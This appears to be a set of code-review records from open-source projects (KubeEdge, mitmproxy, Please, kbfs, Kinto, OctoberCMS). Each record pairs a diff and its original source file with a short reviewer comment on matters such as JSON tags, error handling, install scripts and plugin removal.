ReadDeadline indicates read dead line (second) // default 15 ReadDeadline int32 `json:"readDeadline,omitempty"` // Server indicates websocket server address (ip:port) // +Required Server string `json:"server,omitempty"` // WriteDeadline indicates write dead line (second) // default 15 WriteDeadline int32 `json:"writeDeadline,omitempty"` } // EventBus indicates the event bus module config type EventBus struct { // Enable indicates whether EventBus is enabled, if set to false (for debugging etc.), // skip checking other EventBus configs. 
// default true Enable bool `json:"enable,omitempty"` // MqttQOS indicates mqtt qos // 0: QOSAtMostOnce, 1: QOSAtLeastOnce, 2: QOSExactlyOnce // default 0 // Note: Can not use "omitempty" option, It will affect the output of the default configuration file MqttQOS uint8 `json:"mqttQOS"` // MqttRetain indicates whether server will store the message and can be delivered to future subscribers, // if this flag set true, sever will store the message and can be delivered to future subscribers // default false // Note: Can not use "omitempty" option, It will affect the output of the default configuration file MqttRetain bool `json:"mqttRetain"` // MqttSessionQueueSize indicates the size of how many sessions will be handled. // default 100 MqttSessionQueueSize int32 `json:"mqttSessionQueueSize,omitempty"` // MqttServerInternal indicates internal mqtt broker url // default "tcp://127.0.0.1:1884" MqttServerInternal string `json:"mqttServerInternal,omitempty"` // MqttServerExternal indicates external mqtt broker url // default "tcp://127.0.0.1:1883" MqttServerExternal string `json:"mqttServerExternal,omitempty"` // MqttMode indicates which broker type will be choose // 0: internal mqtt broker enable only. // 1: internal and external mqtt broker enable. 
// 2: external mqtt broker enable only // +Required // default: 2 MqttMode MqttMode `json:"mqttMode"` // Tls indicates tls config for EventBus module TLS *EventBusTLS `json:"eventBusTLS,omitempty"` } // EventBusTLS indicates the EventBus tls config with MQTT broker type EventBusTLS struct { // Enable indicates whether enable tls connection // default false Enable bool `json:"enable,omitempty"` // TLSMqttCAFile sets ca file path // default "/etc/kubeedge/ca/rootCA.crt" TLSMqttCAFile string `json:"tlsMqttCAFile,omitempty"` // TLSMqttCertFile indicates the file containing x509 Certificate for HTTPS // default "/etc/kubeedge/certs/server.crt" TLSMqttCertFile string `json:"tlsMqttCertFile,omitempty"` // TLSMqttPrivateKeyFile indicates the file containing x509 private key matching tlsMqttCertFile // default "/etc/kubeedge/certs/server.key" TLSMqttPrivateKeyFile string `json:"tlsMqttPrivateKeyFile,omitempty"` } // MetaManager indicates the MetaManager module config type MetaManager struct { // Enable indicates whether MetaManager is enabled, // if set to false (for debugging etc.), skip checking other MetaManager configs. // default true Enable bool `json:"enable,omitempty"` // ContextSendGroup indicates send group ContextSendGroup metaconfig.GroupName `json:"contextSendGroup,omitempty"` // ContextSendModule indicates send module ContextSendModule metaconfig.ModuleName `json:"contextSendModule,omitempty"` // PodStatusSyncInterval indicates pod status sync // default 60 PodStatusSyncInterval int32 `json:"podStatusSyncInterval,omitempty"` // RemoteQueryTimeout indicates remote query timeout (second) // default 60 RemoteQueryTimeout int32 `json:"remoteQueryTimeout,omitempty"` } // ServiceBus indicates the ServiceBus module config type ServiceBus struct { // Enable indicates whether ServiceBus is enabled, // if set to false (for debugging etc.), skip checking other ServiceBus configs. 
// default false Enable bool `json:"enable"` } // DeviceTwin indicates the DeviceTwin module config type DeviceTwin struct { // Enable indicates whether DeviceTwin is enabled, // if set to false (for debugging etc.), skip checking other DeviceTwin configs. // default true Enable bool `json:"enable,omitempty"` } // DBTest indicates the DBTest module config type DBTest struct { // Enable indicates whether DBTest is enabled, // if set to false (for debugging etc.), skip checking other DBTest configs. // default false Enable bool `json:"enable"` } // EdgeMesh indicates the EdgeMesh module config type EdgeMesh struct { // Enable indicates whether EdgeMesh is enabled, // if set to false (for debugging etc.), skip checking other EdgeMesh configs. // default true Enable bool `json:"enable,omitempty"` // lbStrategy indicates load balance strategy name // default "RoundRobin" LBStrategy string `json:"lbStrategy,omitempty"` // ListenInterface indicates the listen interface of EdgeMesh // default "docker0" ListenInterface string `json:"listenInterface,omitempty"` // SubNet indicates the subnet of EdgeMesh // default "9.251.0.0/16" SubNet string `json:"subNet,omitempty"` // ListenPort indicates the listen port of EdgeMesh // default 40001 ListenPort int `json:"listenPort,omitempty"` } // EdgeSream indicates the stream controller type EdgeStream struct { // Enable indicates whether edgestream is enabled, if set to false (for debugging etc.), skip checking other configs. 
// default true Enable bool `json:"enable"` // TLSTunnelCAFile indicates ca file path // default /etc/kubeedge/ca/rootCA.crt TLSTunnelCAFile string `json:"tlsTunnelCAFile,omitempty"` // TLSTunnelCertFile indicates the file containing x509 Certificate for HTTPS // default /etc/kubeedge/certs/server.crt TLSTunnelCertFile string `json:"tlsTunnelCertFile,omitempty"` // TLSTunnelPrivateKeyFile indicates the file containing x509 private key matching tlsCertFile // default /etc/kubeedge/certs/server.key TLSTunnelPrivateKeyFile string `json:"tlsTunnelPrivateKeyFile,omitempty"` // HandshakeTimeout indicates handshake timeout (second) // default 30 HandshakeTimeout int32 `json:"handshakeTimeout,omitempty"` // ReadDeadline indicates read dead line (second) // default 15 ReadDeadline int32 `json:"readDeadline,omitempty"` // TunnelServer indicates websocket server address (ip:port) // +Required TunnelServer string `json:"server,omitempty"` // WriteDeadline indicates write dead line (second) // default 15 WriteDeadline int32 `json:"writeDeadline,omitempty"` }
1
20,507
We'd better add the `json:"metaServer,omitempty"` here
kubeedge-kubeedge
go
@@ -0,0 +1,17 @@ +#!/usr/bin/env python3 +import platform +import sys +from pathlib import Path +from subprocess import check_call + +here = Path(__file__).parent + +pip_install = [ + sys.executable, "-m", + "pip", + "install", + "--disable-pip-version-check", +] + +check_call([*pip_install, "--require-hashes", "-r", f"requirements-{platform.system().lower()}.txt"], cwd=here) +check_call([*pip_install, "--no-deps", "-e", "../.."], cwd=here)
1
1
15,677
So... when we want to install mitmproxy with pinned dependencies, we first install all pinned dependencies, and then in a second step install mitmproxy as editable, making sure that no additional dependencies are sneaking in.
mitmproxy-mitmproxy
py
@@ -68,7 +68,10 @@ func Sandbox(args []string) error { } } err = syscall.Exec(cmd, args, env) - return fmt.Errorf("Failed to exec %s: %s", cmd, err) + if err != nil { + return fmt.Errorf("Failed to exec %s: %s", cmd, err) + } + return nil } func rewriteEnvVars(env []string, from, to string) {
1
//go:build linux // +build linux package sandbox import ( "fmt" "os" "os/exec" "strings" "syscall" "golang.org/x/sys/unix" "github.com/thought-machine/please/src/core" ) // mdLazytime is the bit for lazily flushing disk writes. // TODO(jpoole): find out if there's a reason this isn't in syscall const mdLazytime = 1 << 25 const sandboxDirsVar = "SANDBOX_DIRS" var sandboxMountDir = core.SandboxDir func Sandbox(args []string) error { if len(args) < 2 { return fmt.Errorf("incorrect number of args to call plz sandbox") } env := os.Environ() cmd, err := exec.LookPath(args[0]) if err != nil { return fmt.Errorf("Failed to lookup %s on path: %s", args[0], err) } unshareMount := os.Getenv("SHARE_MOUNT") != "1" unshareNetwork := os.Getenv("SHARE_NETWORK") != "1" if unshareMount { tmpDirEnv := os.Getenv("TMP_DIR") if tmpDirEnv == "" { return fmt.Errorf("$TMP_DIR is not set but required. It must contain the directory path to be sandboxed") } if err := sandboxDir(tmpDirEnv); err != nil { return err } if err := mountSandboxDirs(); err != nil { return fmt.Errorf("Failed to mount over sandboxed dirs: %w", err) } rewriteEnvVars(env, tmpDirEnv, sandboxMountDir) if err := os.Chdir(sandboxMountDir); err != nil { return fmt.Errorf("Failed to chdir to %s: %s", sandboxMountDir, err) } if err := mountProc(); err != nil { return err } } if unshareNetwork { if err := loUp(); err != nil { return fmt.Errorf("Failed to bring loopback interface up: %s", err) } } err = syscall.Exec(cmd, args, env) return fmt.Errorf("Failed to exec %s: %s", cmd, err) } func rewriteEnvVars(env []string, from, to string) { for i, envVar := range env { if strings.Contains(envVar, from) { parts := strings.Split(envVar, "=") key := parts[0] value := strings.TrimPrefix(envVar, key+"=") env[i] = key + "=" + strings.ReplaceAll(value, from, to) } } } func sandboxDir(dir string) error { if strings.HasPrefix(dir, "/tmp") { return fmt.Errorf("Not mounting /tmp as %s is a subdir", dir) } // Remounting / as private is necessary 
so that the tmpfs mount isn't visible to anyone else. if err := syscall.Mount("", "/", "", syscall.MS_REC|syscall.MS_PRIVATE, ""); err != nil { return fmt.Errorf("Failed to mount root: %w", err) } flags := mdLazytime | syscall.MS_NOATIME | syscall.MS_NODEV | syscall.MS_NOSUID if err := syscall.Mount("", "/tmp", "tmpfs", uintptr(flags), ""); err != nil { return fmt.Errorf("Failed to mount /tmp: %w", err) } if err := os.Setenv("TMPDIR", "/tmp"); err != nil { return fmt.Errorf("Failed to set $TMPDIR: %w", err) } if err := os.Mkdir(sandboxMountDir, os.ModeDir|0775); err != nil { return fmt.Errorf("Failed to make %s: %w", sandboxMountDir, err) } if err := syscall.Mount(dir, sandboxMountDir, "", syscall.MS_BIND, ""); err != nil { return fmt.Errorf("Failed to bind %s to %s : %w", dir, sandboxMountDir, err) } if err := syscall.Mount("", "/", "", syscall.MS_REMOUNT|syscall.MS_RDONLY|syscall.MS_BIND, ""); err != nil { return fmt.Errorf("Failed to remount root as readonly: %w", err) } return nil } func mountProc() error { if err := syscall.Mount("proc", "/proc", "proc", 0, ""); err != nil { return fmt.Errorf("Failed to mount /proc: %w", err) } return nil } func mountSandboxDirs() error { dirs := strings.Split(os.Getenv(sandboxDirsVar), ",") for _, d := range dirs { if d == "" { continue } if err := syscall.Mount("", d, "tmpfs", mdLazytime|syscall.MS_NOATIME|syscall.MS_NODEV|syscall.MS_NOSUID, ""); err != nil { return fmt.Errorf("Failed to mount sandbox dir %s: %w", d, err) } } return os.Unsetenv(sandboxDirsVar) } // loUp brings up the loopback network interface. func loUp() error { sock, err := unix.Socket(unix.AF_INET, unix.SOCK_DGRAM, 0) if err != nil { return err } defer unix.Close(sock) ifreq, err := unix.NewIfreq("lo") if err != nil { return err } if err := unix.IoctlIfreq(sock, unix.SIOCGIFFLAGS, ifreq); err != nil { return err } ifreq.SetUint32(ifreq.Uint32() | unix.IFF_UP) return unix.IoctlIfreq(sock, unix.SIOCSIFFLAGS, ifreq) }
1
10,445
not sure how this got in master, but the linter is unhappy about it so I fixed it here
thought-machine-please
go
@@ -15,3 +15,8 @@ const rekeyRecheckInterval = 30 * time.Second // rekeyInitialTTL is the maximum number rechecks each rekey request can trigger. const rekeyInitialTTL = 4 + +// mdserverReconnectBackoffWindow is a backoff window within which we try to +// wait randomly for before reconnecting to MD server. +// TODO: increase this to 5 min +const mdserverReconnectBackoffWindow = 5 * time.Minute
1
// Copyright 2017 Keybase Inc. All rights reserved. // Use of this source code is governed by a BSD // license that can be found in the LICENSE file. package libkbfs import "time" // RPCReconnectInterval specifies the time between reconnect attempts for RPC Connections. const RPCReconnectInterval = 2 * time.Second // rekeyRecheckInterval is the time duration to wait for before rechecking for // rekey for the same TLF. See fbo.Rekey for more details. const rekeyRecheckInterval = 30 * time.Second // rekeyInitialTTL is the maximum number rechecks each rekey request can trigger. const rekeyInitialTTL = 4
1
16,874
No need for this TODO anymore, right?
keybase-kbfs
go
@@ -47,7 +47,8 @@ def main(global_config, config=None, **settings): # In Kinto API 1.x, a default bucket is available. # Force its inclusion if not specified in settings. - if 'kinto.plugins.default_bucket' not in settings['includes']: + if 'kinto.plugins.default_bucket' not in settings['includes'] \ + and 'kinto.plugins.default_bucket' not in settings['excludes']: config.include('kinto.plugins.default_bucket') # Retro-compatibility with first Kinto clients.
1
import pkg_resources import logging import cliquet from pyramid.config import Configurator from pyramid.settings import asbool from pyramid.security import Authenticated from kinto.authorization import RouteFactory # Module version, as defined in PEP-0396. __version__ = pkg_resources.get_distribution(__package__).version # Implemented HTTP API Version HTTP_API_VERSION = '1.4' # Main kinto logger logger = logging.getLogger(__name__) DEFAULT_SETTINGS = { 'retry_after_seconds': 3, 'cache_backend': 'cliquet.cache.memory', 'permission_backend': 'cliquet.permission.memory', 'storage_backend': 'cliquet.storage.memory', 'project_docs': 'https://kinto.readthedocs.org/', 'bucket_create_principals': Authenticated, 'multiauth.authorization_policy': ( 'kinto.authorization.AuthorizationPolicy'), 'experimental_collection_schema_validation': 'False', 'http_api_version': HTTP_API_VERSION } def main(global_config, config=None, **settings): if not config: config = Configurator(settings=settings, root_factory=RouteFactory) # Force project name, since it determines settings prefix. config.add_settings({'cliquet.project_name': 'kinto'}) cliquet.initialize(config, version=__version__, default_settings=DEFAULT_SETTINGS) settings = config.get_settings() # In Kinto API 1.x, a default bucket is available. # Force its inclusion if not specified in settings. if 'kinto.plugins.default_bucket' not in settings['includes']: config.include('kinto.plugins.default_bucket') # Retro-compatibility with first Kinto clients. config.registry.public_settings.add('cliquet.batch_max_requests') # Expose capability schema_enabled = asbool( settings['experimental_collection_schema_validation'] ) if schema_enabled: config.add_api_capability( "schema", description="Validates collection records with JSON schemas.", url="http://kinto.readthedocs.org/en/latest/api/1.x/" "collections.html#collection-json-schema") # Scan Kinto views. 
kwargs = {} flush_enabled = asbool(settings.get('flush_endpoint_enabled')) if not flush_enabled: kwargs['ignore'] = 'kinto.views.flush' config.scan("kinto.views", **kwargs) app = config.make_wsgi_app() # Install middleware (idempotent if disabled) return cliquet.install_middlewares(app, settings)
1
8,921
I would assign the key you're looking for into a variable first, and then use it in the comparisons.
Kinto-kinto
py
@@ -855,6 +855,9 @@ class PluginManager if ($pluginPath = self::instance()->getPluginPath($id)) { File::deleteDirectory($pluginPath); } + + // actually remove the plugin from our internal container + unset($this->plugins[ $this->normalizeIdentifier($id) ]); } /**
1
<?php namespace System\Classes; use Db; use App; use Str; use Log; use File; use Lang; use View; use Config; use Schema; use SystemException; use RecursiveIteratorIterator; use RecursiveDirectoryIterator; /** * Plugin manager * * @package october\system * @author Alexey Bobkov, Samuel Georges */ class PluginManager { use \October\Rain\Support\Traits\Singleton; /** * The application instance, since Plugins are an extension of a Service Provider */ protected $app; /** * @var array Container array used for storing plugin information objects. */ protected $plugins; /** * @var array A map of plugins and their directory paths. */ protected $pathMap = []; /** * @var array A map of normalized plugin identifiers [lowercase.identifier => Normalized.Identifier] */ protected $normalizedMap = []; /** * @var bool Flag to indicate that all plugins have had the register() method called by registerAll() being called on this class. */ protected $registered = false; /** * @var bool Flag to indicate that all plugins have had the boot() method called by bootAll() being called on this class. */ protected $booted = false; /** * @var string Path to the JSON encoded file containing the disabled plugins. */ protected $metaFile; /** * @var array Array of disabled plugins */ protected $disabledPlugins = []; /** * @var array Cache of registration method results. */ protected $registrationMethodCache = []; /** * @var bool Prevent all plugins from registering or booting */ public static $noInit = false; /** * Initializes the plugin manager */ protected function init() { $this->bindContainerObjects(); $this->metaFile = storage_path('cms/disabled.json'); $this->loadDisabled(); $this->loadPlugins(); if ($this->app->runningInBackend()) { $this->loadDependencies(); } } /** * These objects are "soft singletons" and may be lost when * the IoC container reboots. This provides a way to rebuild * for the purposes of unit testing. 
*/ public function bindContainerObjects() { $this->app = App::make('app'); } /** * Finds all available plugins and loads them in to the $this->plugins array. * * @return array */ public function loadPlugins() { $this->plugins = []; /** * Locate all plugins and binds them to the container */ foreach ($this->getPluginNamespaces() as $namespace => $path) { $this->loadPlugin($namespace, $path); } $this->sortDependencies(); return $this->plugins; } /** * Loads a single plugin into the manager. * * @param string $namespace Eg: Acme\Blog * @param string $path Eg: plugins_path().'/acme/blog'; * @return void */ public function loadPlugin($namespace, $path) { $className = $namespace . '\Plugin'; $classPath = $path . '/Plugin.php'; try { // Autoloader failed? if (!class_exists($className)) { include_once $classPath; } // Not a valid plugin! if (!class_exists($className)) { return; } $classObj = new $className($this->app); } catch (\Throwable $e) { Log::error('Plugin ' . $className . ' could not be instantiated.', [ 'message' => $e->getMessage(), 'file' => $e->getFile(), 'line' => $e->getLine(), 'trace' => $e->getTraceAsString() ]); return; } $classId = $this->getIdentifier($classObj); /* * Check for disabled plugins */ if ($this->isDisabled($classId)) { $classObj->disabled = true; } $this->plugins[$classId] = $classObj; $this->pathMap[$classId] = $path; $this->normalizedMap[strtolower($classId)] = $classId; return $classObj; } /** * Runs the register() method on all plugins. Can only be called once. * * @param bool $force Defaults to false, if true will force the re-registration of all plugins. Use unregisterAll() instead. * @return void */ public function registerAll($force = false) { if ($this->registered && !$force) { return; } foreach ($this->plugins as $pluginId => $plugin) { $this->registerPlugin($plugin, $pluginId); } $this->registered = true; } /** * Unregisters all plugins: the inverse of registerAll(). 
* * @return void */ public function unregisterAll() { $this->registered = false; $this->plugins = []; } /** * Registers a single plugin object. * * @param PluginBase $plugin The instantiated Plugin object * @param string $pluginId The string identifier for the plugin * @return void */ public function registerPlugin($plugin, $pluginId = null) { if (!$pluginId) { $pluginId = $this->getIdentifier($plugin); } $pluginPath = $this->getPluginPath($plugin); $pluginNamespace = strtolower($pluginId); /* * Register language namespaces */ $langPath = $pluginPath . '/lang'; if (File::isDirectory($langPath)) { Lang::addNamespace($pluginNamespace, $langPath); } /** * Prevent autoloaders from loading if plugin is disabled */ if ($plugin->disabled) { return; } /* * Register plugin class autoloaders */ $autoloadPath = $pluginPath . '/vendor/autoload.php'; if (File::isFile($autoloadPath)) { ComposerManager::instance()->autoload($pluginPath . '/vendor'); } /* * Register configuration path */ $configPath = $pluginPath . '/config'; if (File::isDirectory($configPath)) { Config::package($pluginNamespace, $configPath, $pluginNamespace); } /* * Register views path */ $viewsPath = $pluginPath . '/views'; if (File::isDirectory($viewsPath)) { View::addNamespace($pluginNamespace, $viewsPath); } /** * Disable plugin registration for restricted pages, unless elevated */ if (self::$noInit && !$plugin->elevated) { return; } /** * Run the plugin's register() method */ $plugin->register(); /* * Add init, if available */ $initFile = $pluginPath . '/init.php'; if (File::exists($initFile)) { require $initFile; } /* * Add routes, if available */ $routesFile = $pluginPath . '/routes.php'; if (File::exists($routesFile)) { require $routesFile; } } /** * Runs the boot() method on all plugins. Can only be called once. 
* * @param bool $force Defaults to false, if true will force the re-booting of all plugins * @return void */ public function bootAll($force = false) { if ($this->booted && !$force) { return; } foreach ($this->plugins as $plugin) { $this->bootPlugin($plugin); } $this->booted = true; } /** * Boots the provided plugin object. * * @param PluginBase $plugin * @return void */ public function bootPlugin($plugin) { if (!$plugin || $plugin->disabled || (self::$noInit && !$plugin->elevated)) { return; } $plugin->boot(); } /** * Returns the directory path to a plugin * * @param PluginBase|string $id The plugin to get the path for * @return string|null */ public function getPluginPath($id) { $classId = $this->getIdentifier($id); if (!isset($this->pathMap[$classId])) { return null; } return File::normalizePath($this->pathMap[$classId]); } /** * Check if a plugin exists and is enabled. * * @param string $id Plugin identifier, eg: Namespace.PluginName * @return bool */ public function exists($id) { return $this->findByIdentifier($id) && !$this->isDisabled($id); } /** * Returns an array with all enabled plugins * * @return array [$code => $pluginObj] */ public function getPlugins() { return array_diff_key($this->plugins, $this->disabledPlugins); } /** * Returns an array will all plugins detected on the filesystem * * @return array [$code => $pluginObj] */ public function getAllPlugins() { return $this->plugins; } /** * Returns a plugin registration class based on its namespace (Author\Plugin). * * @param string $namespace * @return PluginBase|null */ public function findByNamespace($namespace) { $identifier = $this->getIdentifier($namespace); return $this->plugins[$identifier] ?? null; } /** * Returns a plugin registration class based on its identifier (Author.Plugin). 
* * @param string|PluginBase $identifier * @return PluginBase|null */ public function findByIdentifier($identifier) { if (!isset($this->plugins[$identifier])) { $code = $this->getIdentifier($identifier); $identifier = $this->normalizeIdentifier($code); } return $this->plugins[$identifier] ?? null; } /** * Checks to see if a plugin has been registered. * * @param string|PluginBase * @return bool */ public function hasPlugin($namespace) { $classId = $this->getIdentifier($namespace); $normalized = $this->normalizeIdentifier($classId); return isset($this->plugins[$normalized]); } /** * Returns a flat array of vendor plugin namespaces and their paths * * @return array ['Author\Plugin' => 'plugins/author/plugin'] */ public function getPluginNamespaces() { $classNames = []; foreach ($this->getVendorAndPluginNames() as $vendorName => $vendorList) { foreach ($vendorList as $pluginName => $pluginPath) { $namespace = '\\'.$vendorName.'\\'.$pluginName; $namespace = Str::normalizeClassName($namespace); $classNames[$namespace] = $pluginPath; } } return $classNames; } /** * Returns a 2 dimensional array of vendors and their plugins. * * @return array ['vendor' => ['author' => 'plugins/author/plugin']] */ public function getVendorAndPluginNames() { $plugins = []; $dirPath = plugins_path(); if (!File::isDirectory($dirPath)) { return $plugins; } $it = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($dirPath, RecursiveDirectoryIterator::FOLLOW_SYMLINKS) ); $it->setMaxDepth(2); $it->rewind(); while ($it->valid()) { if (($it->getDepth() > 1) && $it->isFile() && (strtolower($it->getFilename()) == "plugin.php")) { $filePath = dirname($it->getPathname()); $pluginName = basename($filePath); $vendorName = basename(dirname($filePath)); $plugins[$vendorName][$pluginName] = $filePath; } $it->next(); } return $plugins; } /** * Resolves a plugin identifier (Author.Plugin) from a plugin class name or object. 
* * @param mixed Plugin class name or object * @return string Identifier in format of Author.Plugin */ public function getIdentifier($namespace) { $namespace = Str::normalizeClassName($namespace); if (strpos($namespace, '\\') === null) { return $namespace; } $parts = explode('\\', $namespace); $slice = array_slice($parts, 1, 2); $namespace = implode('.', $slice); return $namespace; } /** * Takes a human plugin code (acme.blog) and makes it authentic (Acme.Blog) * Returns the provided identifier if a match isn't found * * @param string $identifier * @return string */ public function normalizeIdentifier($identifier) { $id = strtolower($identifier); if (isset($this->normalizedMap[$id])) { return $this->normalizedMap[$id]; } return $identifier; } /** * Spins over every plugin object and collects the results of a method call. Results are cached in memory. * * @param string $methodName * @return array */ public function getRegistrationMethodValues($methodName) { if (isset($this->registrationMethodCache[$methodName])) { return $this->registrationMethodCache[$methodName]; } $results = []; $plugins = $this->getPlugins(); foreach ($plugins as $id => $plugin) { if (!method_exists($plugin, $methodName)) { continue; } $results[$id] = $plugin->{$methodName}(); } return $this->registrationMethodCache[$methodName] = $results; } // // Disability // /** * Clears the disabled plugins cache file * * @return void */ public function clearDisabledCache() { File::delete($this->metaFile); $this->disabledPlugins = []; } /** * Loads all disabled plugins from the cached JSON file. 
* * @return void */ protected function loadDisabled() { $path = $this->metaFile; if (($configDisabled = Config::get('cms.disablePlugins')) && is_array($configDisabled)) { foreach ($configDisabled as $disabled) { $this->disabledPlugins[$disabled] = true; } } if (File::exists($path)) { $disabled = json_decode(File::get($path), true) ?: []; $this->disabledPlugins = array_merge($this->disabledPlugins, $disabled); } else { $this->populateDisabledPluginsFromDb(); $this->writeDisabled(); } } /** * Determines if a plugin is disabled by looking at the meta information * or the application configuration. * * @param string|PluginBase $id * @return bool */ public function isDisabled($id) { $code = $this->getIdentifier($id); $normalized = $this->normalizeIdentifier($code); return isset($this->disabledPlugins[$normalized]); } /** * Write the disabled plugins to a meta file. * * @return void */ protected function writeDisabled() { File::put($this->metaFile, json_encode($this->disabledPlugins)); } /** * Populates information about disabled plugins from database * * @return void */ protected function populateDisabledPluginsFromDb() { if (!App::hasDatabase()) { return; } if (!Schema::hasTable('system_plugin_versions')) { return; } $disabled = Db::table('system_plugin_versions')->where('is_disabled', 1)->lists('code'); foreach ($disabled as $code) { $this->disabledPlugins[$code] = true; } } /** * Disables a single plugin in the system. 
* * @param string|PluginBase $id Plugin code/namespace * @param bool $isUser Set to true if disabled by the user, false by default * @return bool Returns false if the plugin was already disabled, true otherwise */ public function disablePlugin($id, $isUser = false) { $code = $this->getIdentifier($id); $code = $this->normalizeIdentifier($code); if (isset($this->disabledPlugins[$code])) { return false; } $this->disabledPlugins[$code] = $isUser; $this->writeDisabled(); if ($pluginObj = $this->findByIdentifier($code)) { $pluginObj->disabled = true; } return true; } /** * Enables a single plugin in the system. * * @param string|PluginBase $id Plugin code/namespace * @param bool $isUser Set to true if enabled by the user, false by default * @return bool Returns false if the plugin wasn't already disabled or if the user disabled a plugin that the system is trying to re-enable, true otherwise */ public function enablePlugin($id, $isUser = false) { $code = $this->getIdentifier($id); $code = $this->normalizeIdentifier($code); if (!isset($this->disabledPlugins[$code])) { return false; } // Prevent system from enabling plugins disabled by the user if (!$isUser && $this->disabledPlugins[$code] === true) { return false; } unset($this->disabledPlugins[$code]); $this->writeDisabled(); if ($pluginObj = $this->findByIdentifier($code)) { $pluginObj->disabled = false; } return true; } // // Dependencies // /** * Scans the system plugins to locate any dependencies that are not currently * installed. Returns an array of missing plugin codes keyed by the plugin that requires them. 
* * ['Author.Plugin' => ['Required.Plugin1', 'Required.Plugin2'] * * PluginManager::instance()->findMissingDependencies(); * * @return array */ public function findMissingDependencies() { $missing = []; foreach ($this->plugins as $id => $plugin) { if (!$required = $this->getDependencies($plugin)) { continue; } foreach ($required as $require) { if ($this->hasPlugin($require)) { continue; } if (!in_array($require, $missing)) { $missing[$this->getIdentifier($plugin)][] = $require; } } } return $missing; } /** * Cross checks all plugins and their dependancies, if not met plugins * are disabled and vice versa. * * @return void */ protected function loadDependencies() { foreach ($this->plugins as $id => $plugin) { if (!$required = $this->getDependencies($plugin)) { continue; } $disable = false; foreach ($required as $require) { if (!$pluginObj = $this->findByIdentifier($require)) { $disable = true; } elseif ($pluginObj->disabled) { $disable = true; } } if ($disable) { $this->disablePlugin($id); } else { $this->enablePlugin($id); } } } /** * Sorts a collection of plugins, in the order that they should be actioned, * according to their given dependencies. Least dependent come first. * * @return array Array of sorted plugin identifiers and instantiated classes ['Author.Plugin' => PluginBase] * @throws SystemException If a possible circular dependency is detected */ protected function sortDependencies() { ksort($this->plugins); /* * Canvas the dependency tree */ $checklist = $this->plugins; $result = []; $loopCount = 0; while (count($checklist)) { if (++$loopCount > 2048) { throw new SystemException('Too much recursion! 
Check for circular dependencies in your plugins.'); } foreach ($checklist as $code => $plugin) { /* * Get dependencies and remove any aliens */ $depends = $this->getDependencies($plugin); $depends = array_filter($depends, function ($pluginCode) { return isset($this->plugins[$pluginCode]); }); /* * No dependencies */ if (!$depends) { array_push($result, $code); unset($checklist[$code]); continue; } /* * Find dependencies that have not been checked */ $depends = array_diff($depends, $result); if (count($depends) > 0) { continue; } /* * All dependencies are checked */ array_push($result, $code); unset($checklist[$code]); } } /* * Reassemble plugin map */ $sortedPlugins = []; foreach ($result as $code) { $sortedPlugins[$code] = $this->plugins[$code]; } return $this->plugins = $sortedPlugins; } /** * Returns the plugin identifiers that are required by the supplied plugin. * * @param string $plugin Plugin identifier, object or class * @return array */ public function getDependencies($plugin) { if (is_string($plugin) && (!$plugin = $this->findByIdentifier($plugin))) { return []; } if (!isset($plugin->require) || !$plugin->require) { return []; } return is_array($plugin->require) ? $plugin->require : [$plugin->require]; } /** * @deprecated Plugins are now sorted by default. See getPlugins() * Remove if year >= 2022 */ public function sortByDependencies($plugins = null) { traceLog('PluginManager::sortByDependencies is deprecated. Plugins are now sorted by default. Use PluginManager::getPlugins()'); return array_keys($plugins ?: $this->getPlugins()); } // // Management // /** * Completely roll back and delete a plugin from the system. 
* * @param string $id Plugin code/namespace * @return void */ public function deletePlugin($id) { /* * Rollback plugin */ UpdateManager::instance()->rollbackPlugin($id); /* * Delete from file system */ if ($pluginPath = self::instance()->getPluginPath($id)) { File::deleteDirectory($pluginPath); } } /** * Tears down a plugin's database tables and rebuilds them. * * @param string $id Plugin code/namespace * @return void */ public function refreshPlugin($id) { $manager = UpdateManager::instance(); $manager->rollbackPlugin($id); $manager->updatePlugin($id); } }
1
19,041
Would be better to normalize it at the start of the method to pass through to all the other calls
octobercms-october
php
@@ -167,6 +167,7 @@ class CodeEditor extends FormWidgetBase $this->vars['highlightActiveLine'] = $this->highlightActiveLine; $this->vars['useSoftTabs'] = $this->useSoftTabs; $this->vars['showGutter'] = $this->showGutter; + $this->vars['safeMode'] = $this->parentForm->model->isSafeMode(); $this->vars['language'] = $this->language; $this->vars['margin'] = $this->margin; $this->vars['stretch'] = $this->formField->stretch;
1
<?php namespace Backend\FormWidgets; use Backend\Models\Preference as BackendPreference; use Backend\Classes\FormWidgetBase; /** * Code Editor * Renders a code editor field. * * @package october\backend * @author Alexey Bobkov, Samuel Georges */ class CodeEditor extends FormWidgetBase { // // Configurable properties // /** * @var string Code language to display (php, twig) */ public $language = 'php'; /** * @var boolean Determines whether the gutter is visible. */ public $showGutter = true; /** * @var boolean Indicates whether the the word wrapping is enabled. */ public $wordWrap = true; /** * @var string Cold folding mode: manual, markbegin, markbeginend. */ public $codeFolding = 'manual'; /** * @var boolean Automatically close tags and special characters, * like quotation marks, parenthesis, or brackets. */ public $autoClosing = true; /** * @var boolean Indicates whether the the editor uses spaces for indentation. */ public $useSoftTabs = true; /** * @var boolean Sets the size of the indentation. */ public $tabSize = 4; /** * @var integer Sets the font size. */ public $fontSize = 12; /** * @var integer Sets the editor margin size. */ public $margin = 0; /** * @var string Ace Editor theme to use. */ public $theme = 'twilight'; /** * @var bool Show invisible characters. */ public $showInvisibles = false; /** * @var bool Highlight the active line. */ public $highlightActiveLine = true; /** * @var boolean If true, the editor is set to read-only mode */ public $readOnly = false; /** * @var string Autocomplete mode: manual, basic, live. 
*/ public $autocompletion = 'manual'; /** * @var boolean If true, the editor activate use Snippets */ public $enableSnippets = true; /** * @var boolean If true, the editor show Indent Guides */ public $displayIndentGuides = true; /** * @var boolean If true, the editor show Print Margin */ public $showPrintMargin = false; // // Object properties // /** * @inheritDoc */ protected $defaultAlias = 'codeeditor'; /** * @inheritDoc */ public function init() { $this->applyEditorPreferences(); if ($this->formField->disabled) { $this->readOnly = true; } $this->fillFromConfig([ 'language', 'showGutter', 'wordWrap', 'codeFolding', 'autoClosing', 'useSoftTabs', 'tabSize', 'fontSize', 'margin', 'theme', 'showInvisibles', 'highlightActiveLine', 'readOnly', 'autocompletion', 'enableSnippets', 'displayIndentGuides', 'showPrintMargin' ]); } /** * @inheritDoc */ public function render() { $this->prepareVars(); return $this->makePartial('codeeditor'); } /** * Prepares the widget data */ public function prepareVars() { $this->vars['fontSize'] = $this->fontSize; $this->vars['wordWrap'] = $this->wordWrap; $this->vars['codeFolding'] = $this->codeFolding; $this->vars['autoClosing'] = $this->autoClosing; $this->vars['tabSize'] = $this->tabSize; $this->vars['theme'] = $this->theme; 